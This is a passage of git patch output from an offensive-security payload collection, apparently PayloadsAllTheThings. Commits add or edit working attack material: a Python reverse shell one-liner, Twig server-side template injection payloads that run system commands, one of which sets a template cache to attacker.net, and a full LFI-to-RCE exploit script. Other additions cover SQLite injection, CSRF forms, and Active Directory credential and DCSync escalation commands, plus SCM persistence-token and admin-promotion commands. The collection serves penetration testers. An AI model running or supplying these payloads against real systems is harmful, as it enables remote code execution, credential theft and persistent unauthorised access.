x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` + +Windows only (Python3) + +```powershell +python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()" ``` ### PHP From 7b79bce8195e420ff33a150c4e74607590a1587d Mon Sep 17 00:00:00 2001 From: Vladislav Korchagin <37411315+vladko312@users.noreply.github.com> Date: Sun, 17 Jul 2022 18:35:59 +0300 Subject: [PATCH 10/69] Update README.md --- Server Side Template Injection/README.md | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 21f76c1..f4aba14 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -60,7 +60,10 @@ ## Tools -Recommended tool: [Tplmap](https://github.com/epinna/tplmap) +Recommended tools: + +[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool + e.g: ```powershell @@ -69,6 +72,16 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade ``` +[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) + +e.g: + +```powershell +python3 ./sstimap.py -u 'https://example.com/page?name=John' -s +python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade +python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' +``` + ## Methodology ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) From 0d9a2354e5a3b586ab3fc7144ad951f32431ba70 Mon Sep 17 00:00:00 2001 From: "mr.The" Date: Fri, 12 Aug 2022 18:33:44 +0300 Subject: [PATCH 11/69] Add error-based vector for the sqlite --- SQL Injection/SQLite Injection.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 2cdc050..bc61b61 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -11,6 +11,7 @@ * [Boolean - Enumerating table name](#boolean---enumerating-table-name) * [Boolean - Extract info](#boolean---extract-info) * [Time based](#time-based) +* [Error based](#error-based) * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) * [References](#references) @@ -77,6 +78,12 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` +## Error based + +```sql +AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END +``` + ## Remote Command Execution using SQLite command - Attach Database ```sql @@ -96,3 +103,4 @@ Note: By default this component is disabled ## References [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) +[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/) From f82efffbc7c87aca2e45420b8dda5dd48ca1c96e Mon Sep 17 00:00:00 2001 From: "mr.The" Date: Fri, 12 Aug 2022 18:36:43 +0300 Subject: [PATCH 12/69] Boolean error based* instead of just error based --- SQL Injection/SQLite Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index bc61b61..30d20b9 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -11,7 +11,7 @@ * [Boolean - Enumerating table name](#boolean---enumerating-table-name) * [Boolean - Extract info](#boolean---extract-info) * [Time based](#time-based) -* [Error based](#error-based) +* [Boolean error based](#boolean-error-based) * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) * [References](#references) @@ -78,7 +78,7 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` -## Error based +## Boolean error based ```sql AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END From 1bd82af11ebe66f31fe33fcf6f7482ae8859ebd7 Mon Sep 17 00:00:00 2001 From: Natraj Sangashetty <111265283+natrajms@users.noreply.github.com> Date: Mon, 15 Aug 2022 11:15:33 +0530 Subject: [PATCH 13/69] Updating Reference section hyperlinks --- CSV Injection/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 6c1236f..d631791 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -53,11 +53,11 @@ Any formula can be started with ## References -* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) -* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) +* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) +* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) +* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) + From 6650c361e77196b8755d6688494a44f8926169c6 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 15 Aug 2022 15:02:29 +0200 Subject: [PATCH 14/69] Capture a network trace with builtin tools --- .../Active Directory Attack.md | 46 ++++++++++++------- .../Network Pivoting Techniques.md | 36 ++++++++++++++- Server Side Template Injection/README.md | 3 ++ 3 files changed, 68 insertions(+), 17 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6af65bd..8d4e0b0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -62,7 +62,6 @@ - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - - [UnPAC The Hash](#unpac-the-hash) - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) @@ -84,6 +83,7 @@ - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing DNS Admins Group](#abusing-dns-admins-group) @@ -1915,21 +1915,6 @@ root@kali:~$ klist .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` -### UnPAC The Hash - -* Windows - ```ps1 - # request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. - C:/> Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show - ``` -* Linux - ```ps1 - # obtain a TGT by validating a PKINIT pre-authentication - $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" - - # use the session key to recover the NT hash - $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' - ``` ### Capturing and cracking Net-NTLMv1/NTLMv1 hashes @@ -2516,6 +2501,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 #### Pass-The-Certificate +> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential" + * Windows ```ps1 # Information about a cert file @@ -2523,6 +2510,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # From a Base64 PFX Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + + # Grant DCSync rights to an user + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid + # To restore + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt ``` * Linux ```ps1 @@ -2534,8 +2526,30 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # PFX certificate (file) + password (string, optionnal) gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Using Certipy + certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' + certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" ``` +### UnPAC The Hash + +Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. + +* Windows + ```ps1 + # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. + Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + ``` +* Linux + ```ps1 + # Obtain a TGT by validating a PKINIT pre-authentication + $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Use the session key to recover the NT hash + $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' + ``` + ### Shadow Credentials diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 35db818..48b3358 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -20,6 +20,7 @@ * [RevSocks](#revsocks) * [plink](#plink) * [ngrok](#ngrok) +* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools) * [Basic Pivoting Types](#basic-pivoting-types) * [Listen - Listen](#listen---listen) * [Listen - Connect](#listen---connect) @@ -410,7 +411,39 @@ tar xvzf cloudflared-stable-linux-amd64.tgz # Expose accessible internal service to the internet ./cloudflared tunnel --url ://: ``` - + +## Capture a network trace with builtin tools + +* Windows (netsh) + ```ps1 + # start a capture use the netsh command. + netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 + + # stop the trace + netsh trace stop + + # Event tracing can be also used across a reboots + netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 + + # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version. + etl2pcapng.exe c:\trace.etl c:\trace.pcapng + + # Use filters + netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 + ``` +* Linux (tcpdump) + ```ps1 + sudo apt-get install tcpdump + tcpdump -w 0001.pcap -i eth0 + tcpdump -A -i eth0 + + # capture every TCP packet + tcpdump -i eth0 tcp + + # capture everything on port 22 + tcpdump -i eth0 port 22 + ``` + ## Basic Pivoting Types @@ -456,3 +489,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz * 🇫🇷 [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) * [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) +* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79f9bfc..a9b4398 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -829,6 +829,9 @@ $output = $twig > render ( {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} +{{[0]|reduce('system','id')}} +{{['id']|map('system')|join}} +{{['id',1]|sort('system')|join}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} ``` From b3e6220da660ace9ab677e1c984cf94287f7ef86 Mon Sep 17 00:00:00 2001 From: DoI <5291556+denandz@users.noreply.github.com> Date: Wed, 17 Aug 2022 09:29:05 +1200 Subject: [PATCH 15/69] Add multipart/form-data CSRF technique --- CSRF Injection/README.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md index 0ccd714..f6eb20b 100644 --- a/CSRF Injection/README.md +++ b/CSRF Injection/README.md @@ -11,6 +11,7 @@ * [HTML GET - No User Interaction)](#html-get---no-user-interaction) * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction) * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction) + * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction) * [JSON GET - Simple Request](#json-get---simple-request) * [JSON POST - Simple Request](#json-post---simple-request) * [JSON POST - Complex Request](#json-post---complex-request) @@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden ``` +### HTML POST - multipart/form-data with file upload - Requiring User Interaction + +```html + + +

+ + + + +``` + ### JSON GET - Simple Request From 804920be629e26f81ee781dface199d8e0982671 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 18 Aug 2022 10:43:01 +0200 Subject: [PATCH 16/69] Source Code Management --- .../Source Code Management.md | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 Methodology and Resources/Source Code Management.md diff --git a/Methodology and Resources/Source Code Management.md b/Methodology and Resources/Source Code Management.md new file mode 100644 index 0000000..d0295ba --- /dev/null +++ b/Methodology and Resources/Source Code Management.md @@ -0,0 +1,125 @@ +# Source Code Management + +> + +## Summary + +* [Enumeration](#enumeration) +* [Exploit Gitlab CI/Github Actions](#exploit-gitlab-cigithub-actions) +* [References](#references) + + +## Enumeration + + +Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit) + +* Discover repositories being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local + ``` +* Search for repositories by repository name in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* Search for code containing a given keyword in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term" + ``` +* Search for files in repositories containing a given keyword in the file name in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* List snippets owned by the current user in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local + ``` +* List all GitLab runners available to the current user in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local + ``` +* Get the assigned privileges to an access token being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local + ``` +* Promote a normal user to an administrative role in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName + ``` +* Create/List/Delete an access token to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID + SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser + SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser + ``` +* Create/List an SSH key to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local + SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local + SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID + SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID + ``` + +## Personal Access Token + +Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. + +```ps1 +curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" +``` + +## Exploit Gitlab CI/Github Actions + +* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` + ```yaml + stages: + - test + + test: + stage: test + script: + - | + whoami + parallel: + matrix: + - RUNNER: VM1 + - RUNNER: VM2 + - RUNNER: VM3 + tags: + - ${RUNNER} + ``` +* Github Action "Command Execution" example: `.github/workflows/example.yml` + ```yml + name: example + on: + workflow_dispatch: + push: + branches: [ main ] + pull_request: + branches: [ main ] + + jobs: + build: + runs-on: windows-2019 + + steps: + - name: Execute + run: | + whoami + ``` + +## References + +* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) \ No newline at end of file From 8d70f262ae768d3dadd01dde0300eef543981eb8 Mon Sep 17 00:00:00 2001 From: Wlayzz <34021743+wlayzz@users.noreply.github.com> Date: Fri, 19 Aug 2022 15:04:52 +0200 Subject: [PATCH 17/69] Update Java SSTI Adding variable expressions alternative for java injection --- Server Side Template Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index a9b4398..5b264ca 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -311,6 +311,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ## Java ### Java - Basic injection +> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `*{...}`. ```java ${7*7} From 961d9356231c9501d959960fa6f3414e05999fc0 Mon Sep 17 00:00:00 2001 From: Wlayzz <34021743+wlayzz@users.noreply.github.com> Date: Fri, 19 Aug 2022 16:22:39 +0200 Subject: [PATCH 18/69] Update java ssti fix little inattention --- Server Side Template Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 5b264ca..797af48 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -311,7 +311,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ## Java ### Java - Basic injection -> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `*{...}`. +> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. ```java ${7*7} From fbd7517e047d9b4eed2e169490b4fbd74fa00b92 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 21 Aug 2022 16:38:54 +0200 Subject: [PATCH 19/69] LFI2RCE - Picture Compression - SOCKS5 CS --- File Inclusion/LFI2RCE.py | 60 ++++++++++++++++++ File Inclusion/README.md | 36 ++++++++--- .../Cobalt Strike - Cheatsheet.md | 5 ++ .../GIF_exploit.gif | Bin .../JPG_exploit-55.jpg | Bin .../PNG_110x110_resize_bypass_use_LFI.png | Bin .../PNG_32x32_resize_bypass_use_LFI.png | Bin .../createBulletproofJPG.py} | 7 +- .../createCompressedPNG_110x110.php} | 0 .../createGIFwithGlobalColorTable.php | 22 +++++++ .../Picture Compression/createPNGwithPLTE.php | 28 ++++++++ .../Picture Resize/README.txt | 5 -- Upload Insecure Files/README.md | 13 ++-- 13 files changed, 157 insertions(+), 19 deletions(-) create mode 100644 File Inclusion/LFI2RCE.py rename Upload Insecure Files/{Picture Resize => Picture Compression}/GIF_exploit.gif (100%) rename Upload Insecure Files/{Picture Resize => Picture Compression}/JPG_exploit-55.jpg (100%) rename Upload Insecure Files/{Picture Resize => Picture Compression}/PNG_110x110_resize_bypass_use_LFI.png (100%) rename Upload Insecure Files/{Picture Resize => Picture Compression}/PNG_32x32_resize_bypass_use_LFI.png (100%) rename Upload Insecure Files/{Picture Resize/exploit_JPG.py => Picture Compression/createBulletproofJPG.py} (97%) rename Upload Insecure Files/{Picture Resize/exploit_PNG_110x110.php => Picture Compression/createCompressedPNG_110x110.php} (100%) create mode 100644 Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php create mode 100644 Upload Insecure Files/Picture Compression/createPNGwithPLTE.php delete mode 100644 Upload Insecure Files/Picture Resize/README.txt diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/LFI2RCE.py new file mode 100644 index 0000000..3943715 --- /dev/null +++ b/File Inclusion/LFI2RCE.py @@ -0,0 +1,60 @@ +import requests + +url = "http://localhost:8000/chall.php" +file_to_use = "/etc/passwd" +command = "id" + +# +base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" + +conversions = { + 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', + 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', + 'C': 'convert.iconv.UTF8.CSISO2022KR', + '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', + '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', + 'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', + 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', + 'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', + 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', + 'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', + 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', + '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', + 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', + 'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', + 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', + 'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', + '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', + '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' +} + + +# generate some garbage base64 +filters = "convert.iconv.UTF8.CSISO2022KR|" +filters += "convert.base64-encode|" +# make sure to get rid of any equal signs in both the string we just generated and the rest of the file +filters += "convert.iconv.UTF8.UTF7|" + + +for c in base64_payload[::-1]: + filters += conversions[c] + "|" + # decode and reencode to get rid of everything that isn't valid base64 + filters += "convert.base64-decode|" + filters += "convert.base64-encode|" + # get rid of equal signs + filters += "convert.iconv.UTF8.UTF7|" + +filters += "convert.base64-decode" + +final_payload = f"php://filter/{filters}/resource={file_to_use}" + +with open('payload', 'w') as f: + f.write(final_payload) + +r = requests.get(url, params={ + "0": command, + "action": "include", + "file": final_payload +}) + +print(r.text) \ No newline at end of file diff --git a/File Inclusion/README.md b/File Inclusion/README.md index b1a9170..f6bfef4 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` -can be chained with a compression wrapper for large files. +Wrappers can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd @@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`: curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` +Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload. + +```powershell +# vulnerable file: index.php +# vulnerable parameter: file +# executed command: id +# executed PHP code: +curl 